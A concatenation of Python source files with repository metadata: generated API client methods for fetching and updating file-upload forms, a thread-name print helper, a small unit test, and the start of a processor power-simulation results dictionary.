response_type='EmptyResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_form_by_id(self, id, ev_api_key, ev_access_token, **kwargs): # noqa: E501 """Get receive folder form by Id # noqa: E501 Returns the [file upload form](/docs/account/05-file-sharing/05-form-builder) assigned to a [receive folder](/docs/account/05-file-sharing/04-receive-folders). The form details will return all the input fields and their settings. Use the `include` parameter (with the value **share**) to also retrieve the details of the associated receive folder. **Note** If you prefer to find a form by its shareHash, you can use the [GET /forms](#operation/getFormByShareHash) endpoint instead. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_form_by_id(id, ev_api_key, ev_access_token, async_req=True) >>> result = thread.get() :param async_req bool :param int id: Form unique ID number. (required) :param str ev_api_key: API key required to make the API call. (required) :param str ev_access_token: Access Token required to make the API call. (required) :param str include: Enter \"**share**\" to get information about associated receive folder. :return: FormResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_form_by_id_with_http_info(id, ev_api_key, ev_access_token, **kwargs) # noqa: E501 else: (data) = self.get_form_by_id_with_http_info(id, ev_api_key, ev_access_token, **kwargs) # noqa: E501 return data def get_form_by_id_with_http_info(self, id, ev_api_key, ev_access_token, **kwargs): # noqa: E501 """Get receive folder form by Id # noqa: E501 Returns the [file upload form](/docs/account/05-file-sharing/05-form-builder) assigned to a [receive folder](/docs/account/05-file-sharing/04-receive-folders). The form details will return all the input fields and their settings. Use the `include` parameter (with the value **share**) to also retrieve the details of the associated receive folder. **Note** If you prefer to find a form by its shareHash, you can use the [GET /forms](#operation/getFormByShareHash) endpoint instead. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_form_by_id_with_http_info(id, ev_api_key, ev_access_token, async_req=True) >>> result = thread.get() :param async_req bool :param int id: Form unique ID number. (required) :param str ev_api_key: API key required to make the API call. (required) :param str ev_access_token: Access Token required to make the API call. (required) :param str include: Enter \"**share**\" to get information about associated receive folder. :return: FormResponse If the method is called asynchronously, returns the request thread. """ all_params = ['id', 'ev_api_key', 'ev_access_token', 'include'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_form_by_id" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `get_form_by_id`") # noqa: E501 # verify the required parameter 'ev_api_key' is set if ('ev_api_key' not in params or params['ev_api_key'] is None): raise ValueError("Missing the required parameter `ev_api_key` when calling `get_form_by_id`") # noqa: E501 # verify the required parameter 'ev_access_token' is set if ('ev_access_token' not in params or params['ev_access_token'] is None): raise ValueError("Missing the required parameter `ev_access_token` when calling `get_form_by_id`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] if 'include' in params: query_params.append(('include', params['include'])) # noqa: E501 header_params = {} if 'ev_api_key' in params: header_params['ev-api-key'] = params['ev_api_key'] # noqa: E501 if 'ev_access_token' in params: header_params['ev-access-token'] = params['ev_access_token'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/forms/{id}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='FormResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_form_by_share_hash(self, ev_api_key, ev_access_token, share_hash, **kwargs): # noqa: E501 """Get receive folder form settings # noqa: E501 Get the information for the [file upload form](/docs/account/05-file-sharing/05-form-builder) assigned to a [receive folder](/docs/account/05-file-sharing/04-receive-folders) by its shareHash. The form details will return all the input field settings and the CSS for the form. Use the `include` parameter (with the value **share**) to also get the details of the associated receive folder. **Note** - If you prefer to find a form by its ID, you can use the [GET /forms/{id}](#operation/getFormById) endpoint instead. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_form_by_share_hash(ev_api_key, ev_access_token, share_hash, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API key required to make the API call. (required) :param str ev_access_token: Access Token required to make the API call. (required) :param str share_hash: Share hash to retrieve the form for. (required) :param str include: Related record types to include in the response. Valid option is **share** :return: FormResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_form_by_share_hash_with_http_info(ev_api_key, ev_access_token, share_hash, **kwargs) # noqa: E501 else: (data) = self.get_form_by_share_hash_with_http_info(ev_api_key, ev_access_token, share_hash, **kwargs) # noqa: E501 return data def get_form_by_share_hash_with_http_info(self, ev_api_key, ev_access_token, share_hash, **kwargs): # noqa: E501 """Get receive folder form settings # noqa: E501 Get the information for the [file upload form](/docs/account/05-file-sharing/05-form-builder) assigned to a [receive folder](/docs/account/05-file-sharing/04-receive-folders) by its shareHash. The form details will return all the input field settings and the CSS for the form. Use the `include` parameter (with the value **share**) to also get the details of the associated receive folder. **Note** - If you prefer to find a form by its ID, you can use the [GET /forms/{id}](#operation/getFormById) endpoint instead. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_form_by_share_hash_with_http_info(ev_api_key, ev_access_token, share_hash, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API key required to make the API call. (required) :param str ev_access_token: Access Token required to make the API call. (required) :param str share_hash: Share hash to retrieve the form for. (required) :param str include: Related record types to include in the response. Valid option is **share** :return: FormResponse If the method is called asynchronously, returns the request thread. """ all_params = ['ev_api_key', 'ev_access_token', 'share_hash', 'include'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_form_by_share_hash" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ev_api_key' is set if ('ev_api_key' not in params or params['ev_api_key'] is None): raise ValueError("Missing the required parameter `ev_api_key` when calling `get_form_by_share_hash`") # noqa: E501 # verify the required parameter 'ev_access_token' is set if ('ev_access_token' not in params or params['ev_access_token'] is None): raise ValueError("Missing the required parameter `ev_access_token` when calling `get_form_by_share_hash`") # noqa: E501 # verify the required parameter 'share_hash' is set if ('share_hash' not in params or params['share_hash'] is None): raise ValueError("Missing the required parameter `share_hash` when calling `get_form_by_share_hash`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] if 'share_hash' in params: query_params.append(('shareHash', params['share_hash'])) # noqa: E501 if 'include' in params: query_params.append(('include', params['include'])) # noqa: E501 header_params = {} if 'ev_api_key' in params: header_params['ev-api-key'] = params['ev_api_key'] # noqa: E501 if 'ev_access_token' in params: header_params['ev-access-token'] = params['ev_access_token'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/forms', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='FormResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_form_entries(self, ev_api_key, ev_access_token, id, **kwargs): # noqa: E501 """Get form data entries for a receive # noqa: E501 Returns the form data entries for a specific form for a receive. Optional parameters can be included in the call to manage larger data sets. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_form_entries(ev_api_key, ev_access_token, id, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API Key required to make the API call. (required) :param str ev_access_token: Access token required to make the API call. (required) :param int id: ID of the form to retrieve entries for. (required) :param int limit: Limit of records to be returned (for pagination) :param int offset: Current offset of records (for pagination) :return: FormEntryResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_form_entries_with_http_info(ev_api_key, ev_access_token, id, **kwargs) # noqa: E501 else: (data) = self.get_form_entries_with_http_info(ev_api_key, ev_access_token, id, **kwargs) # noqa: E501 return data def get_form_entries_with_http_info(self, ev_api_key, ev_access_token, id, **kwargs): # noqa: E501 """Get form data entries for a receive # noqa: E501 Returns the form data entries for a specific form for a receive. Optional parameters can be included in the call to manage larger data sets. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_form_entries_with_http_info(ev_api_key, ev_access_token, id, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API Key required to make the API call. (required) :param str ev_access_token: Access token required to make the API call. (required) :param int id: ID of the form to retrieve entries for. (required) :param int limit: Limit of records to be returned (for pagination) :param int offset: Current offset of records (for pagination) :return: FormEntryResponse If the method is called asynchronously, returns the request thread. """ all_params = ['ev_api_key', 'ev_access_token', 'id', 'limit', 'offset'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_form_entries" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ev_api_key' is set if ('ev_api_key' not in params or params['ev_api_key'] is None): raise ValueError("Missing the required parameter `ev_api_key` when calling `get_form_entries`") # noqa: E501 # verify the required parameter 'ev_access_token' is set if ('ev_access_token' not in params or params['ev_access_token'] is None): raise ValueError("Missing the required parameter `ev_access_token` when calling `get_form_entries`") # noqa: E501 # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `get_form_entries`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] if 'limit' in params: query_params.append(('limit', params['limit'])) # noqa: E501 if 'offset' in params: query_params.append(('offset', params['offset'])) # noqa: E501 header_params = {} if 'ev_api_key' in params: header_params['ev-api-key'] = params['ev_api_key'] # noqa: E501 if 'ev_access_token' in params: header_params['ev-access-token'] = params['ev_access_token'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/forms/entries/{id}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='FormEntryResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_form_by_id(self, ev_api_key, ev_access_token, id, **kwargs): # noqa: E501 """Updates a form with given parameters # noqa: E501 Add, update, or delete a form's parameters. This will alter how your users/customers will see and interact with the form when sending you files. **Notes** *This call will **replace** your current form in its entirety.* If you want to keep any existing elements unchanged, be sure to submit the call with an element's current settings to preserve them. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_form_by_id(ev_api_key, ev_access_token, id, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API Key required to make the API call. (required) :param str ev_access_token: Access token required to make the API call. (required) :param int id: Form unique ID number. (required) :param UpdateFormByIdRequestBody body: :return: FormResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_form_by_id_with_http_info(ev_api_key, ev_access_token, id, **kwargs) # noqa: E501 else: (data) = self.update_form_by_id_with_http_info(ev_api_key, ev_access_token, id, **kwargs) # noqa: E501 return data def update_form_by_id_with_http_info(self, ev_api_key, ev_access_token, id, **kwargs): # noqa: E501 """Updates a form with given parameters # noqa: E501 Add, update, or delete a form's parameters. This will alter how your users/customers will see and interact with the form when sending you files. **Notes** *This call will **replace** your current form in its entirety.* If you want to keep any existing elements unchanged, be sure to submit the call with an element's current settings to preserve them. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_form_by_id_with_http_info(ev_api_key, ev_access_token, id, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API Key required to make the API call. (required) :param str ev_access_token: Access token required to make the API call. (required) :param int id: Form unique ID number. (required) :param UpdateFormByIdRequestBody body: :return: FormResponse If the method is called asynchronously, returns the request thread. """ all_params = ['ev_api_key', 'ev_access_token', 'id', 'body'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_form_by_id" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ev_api_key' is set if ('ev_api_key' not in params or params['ev_api_key'] is None): raise ValueError("Missing the required parameter `ev_api_key` when calling `update_form_by_id`") # noqa: E501 # verify the required parameter 'ev_access_token' is set if ('ev_access_token' not in params or params['ev_access_token'] is None): raise ValueError("Missing the required parameter `ev_access_token` when calling `update_form_by_id`") # noqa: E501 # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `update_form_by_id`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} if 'ev_api_key' in params: header_params['ev-api-key'] = params['ev_api_key'] # noqa: E501 if 'ev_access_token' in params: header_params['ev-access-token'] = params['ev_access_token'] # noqa: E501 form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/forms/{id}', 'PATCH', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='FormResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)

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null

0

7

bac0aebbad00ba5d789676e704c6744d048c1612

166

py

Python

src/opera/threading/utils.py

philippemerle/xopera-opera

d8fac0b792b2c7e4bc81ab1ad95b9507e9a552b1

[ "Apache-2.0" ]

31

2019-02-12T06:52:24.000Z

2022-03-23T06:48:10.000Z

src/opera/threading/utils.py

philippemerle/xopera-opera

d8fac0b792b2c7e4bc81ab1ad95b9507e9a552b1

[ "Apache-2.0" ]

190

2019-05-09T09:12:38.000Z

2022-03-31T06:21:51.000Z

src/opera/threading/utils.py

philippemerle/xopera-opera

d8fac0b792b2c7e4bc81ab1ad95b9507e9a552b1

[ "Apache-2.0" ]

19

2019-05-09T13:36:22.000Z

2022-01-25T21:27:50.000Z

from threading import current_thread # type: ignore # pylint: disable=no-name-in-module def print_thread(string): print(f"[{current_thread().name}] {string}")

27.666667

88

0.728916

23

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0.73913

0.220339

0

0.126506

166

5

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33.2

0.813793

0.283133

0

0.293103

0.215517

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0.333333

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0.666667

1

0

null

1

0

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0

null

0

1

0

1

0

1

0

7

bae799b3d985b42c42cee96094c3eb52b3449b69

127

py

Python

peon/tests/test_project/test_file/test_class_constants.py

roch1990/peon

0e9e40956c05138c0820fe380b354fdd1fe95e01

[ "MIT" ]

32

2020-05-18T14:02:59.000Z

2022-02-06T15:00:12.000Z

peon/tests/test_project/test_file/test_class_constants.py

roch1990/peon

0e9e40956c05138c0820fe380b354fdd1fe95e01

[ "MIT" ]

42

2020-05-22T20:29:08.000Z

2021-03-10T21:24:23.000Z

peon/tests/test_project/test_file/test_class_constants.py

roch1990/peon

0e9e40956c05138c0820fe380b354fdd1fe95e01

[ "MIT" ]

4

2020-07-02T06:32:42.000Z

2022-01-24T22:46:02.000Z

from peon.src.project.file.file import File def test_python_file_extension(): assert File.PYTHON_FILE_EXTENSION == '.py'

21.166667

46

0.771654

19

127

4.894737

0.631579

0.215054

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baf267d9a96705c982136390177664d95bb80a1d

68,609

py

Python

benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMgromacs/power.py

TugberkArkose/MLScheduler

e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061

[ "Unlicense" ]

null

benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMgromacs/power.py

TugberkArkose/MLScheduler

e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061

[ "Unlicense" ]

null

benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMgromacs/power.py

TugberkArkose/MLScheduler

e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061

[ "Unlicense" ]

null

power = {'BUSES': {'Area': 1.33155, 'Bus/Area': 1.33155, 'Bus/Gate Leakage': 0.00662954, 'Bus/Peak Dynamic': 0.0, 'Bus/Runtime Dynamic': 0.0, 'Bus/Subthreshold Leakage': 0.0691322, 'Bus/Subthreshold Leakage with power gating': 0.0259246, 'Gate Leakage': 0.00662954, 'Peak Dynamic': 0.0, 'Runtime Dynamic': 0.0, 'Subthreshold Leakage': 0.0691322, 'Subthreshold Leakage with power gating': 0.0259246}, 'Core': [{'Area': 32.6082, 'Execution Unit/Area': 8.2042, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.269528, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.414388, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 1.56533, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.122718, 'Execution Unit/Instruction Scheduler/Area': 2.17927, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.663675, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.14925, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.659125, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.47205, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.416027, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 8.44878, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.295724, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0240587, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.270418, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.177929, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.566141, 'Execution Unit/Register Files/Runtime Dynamic': 0.201988, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.727281, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.65886, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155, 'Execution Unit/Runtime Dynamic': 5.15266, 'Execution Unit/Subthreshold Leakage': 1.83518, 'Execution Unit/Subthreshold Leakage with power gating': 0.709678, 'Gate Leakage': 0.372997, 'Instruction Fetch Unit/Area': 5.86007, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00113492, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00113492, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000991447, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00038541, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00255597, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00581725, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0107767, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0590479, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.171048, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.369248, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.580956, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 8.96874, 'Instruction Fetch Unit/Runtime Dynamic': 1.13785, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932587, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0736625, 'L2/Runtime Dynamic': 0.014811, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80969, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 6.33576, 'Load Store Unit/Data Cache/Runtime Dynamic': 2.45833, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0351387, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.164953, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.164953, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 7.11787, 'Load Store Unit/Runtime Dynamic': 3.43678, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 